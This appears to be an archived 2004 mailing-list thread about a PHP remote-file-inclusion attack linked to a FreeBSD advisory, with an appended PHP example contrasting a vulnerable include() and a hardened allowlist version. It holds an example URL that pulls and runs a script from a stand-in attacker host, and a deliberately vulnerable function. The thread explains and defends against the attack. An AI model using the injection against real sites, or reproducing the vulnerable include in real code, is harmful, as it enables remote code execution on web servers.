From: "Gustavo A. Baratto"
To: "Ryan Thompson"
Date: Wed, 11 Aug 2004 14:23:58 -0700
Subject: Re: FreeBSD-SA-04:13.linux in the wild

I think I may have seen such a thing before as well... not a FreeBSD problem though... It's PHP's own fault.

PHP comes with url_fopen enabled by default, so if someone writes a script.php with something like:

include ("$var");

one could call http://goodguys.com/script.php?var=http://badguys.com/malicious_script.txt and the text of malicious_script.php hosted remotely would be included in script.php, and any arbitrary code would be executed with www privileges.

Just disabling url_fopen in php.ini would prevent that.

If this is not what you have seen, please, I'd like to know more about it.
Thank you ;)

----- Original Message -----
From: "Ryan Thompson"
Sent: Wednesday, August 11, 2004 2:07 PM
Subject: FreeBSD-SA-04:13.linux in the wild

> Has anyone else seen this in the wild?
>
> We just had an attempted attack yesterday from a live attacker on one of
> our machines using this vulnerability. It wasn't all that clever, and
> they're long gone, but I *did* manage to catch them in the act and grab
> a copy of the binary they tried to run from /tmp/, as well as the PHP
> injection code they used to subvert a virtual web site's poorly-written
> index.php script to execute commands as a local user.
>
> Their first order of business was uname -a, and the timing of the
> requests appeared to be random and experimental ("cd /tmp; ls -la", a
> few times). If any @FreeBSD.org developers would like more information,
> I'd be happy to share my findings and log output off-list.
>
> - Ryan
>
> --
> Ryan Thompson
>
> SaskNow Technologies - http://www.sasknow.com
> 901-1st Avenue North - Saskatoon, SK - S7K 1Y4
>
> Tel: 306-664-3600 Fax: 306-244-7037 Saskatoon
> Toll-Free: 877-727-5669 (877-SASKNOW) North America
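An added example, written for this archive page and not taken from either message, that places the remote-include pattern Gustavo describes beside an allowlist-based replacement; the `pages/` directory and the page names in the map are assumptions.

```php
<?php
// Added example (not from the thread). The vulnerable function is the
// pattern quoted above: include() driven straight by a request parameter.

// --- Vulnerable: with url_fopen on (PHP 4 era) or allow_url_include on
// (PHP >= 5.2), ?var=http://.../x.txt makes include() fetch and run it.
function vulnerable_include(string $var): void
{
    include($var);
}

// --- Hardened: the parameter is only a key into a fixed map of local
// files, so no user-controlled string ever reaches include().
const PAGE_MAP = [          // assumed page names
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

function safe_include(string $page): bool
{
    if (!isset(PAGE_MAP[$page])) {
        return false;                   // unknown key: refuse outright
    }
    $base = __DIR__ . '/pages/';        // assumed directory
    $real = realpath($base . PAGE_MAP[$page]);
    // realpath() resolves symlinks and '..', so a file that moved outside
    // $base (or does not exist) is rejected rather than included.
    if ($real === false || strpos($real, $base) !== 0) {
        return false;
    }
    include $real;
    return true;
}

// Defence in depth, independent of the code above (php.ini):
//   allow_url_fopen = Off      ; what Gustavo recommends
//   allow_url_include = Off    ; PHP >= 5.2, governs include()/require()
$page = $_GET['page'] ?? 'home';
if (!safe_include($page)) {
    http_response_code(404);
    echo 'Not found';
}
```

The map-based lookup also closes the local-file variant (`?var=../../etc/passwd`) that disabling url_fopen alone does not address.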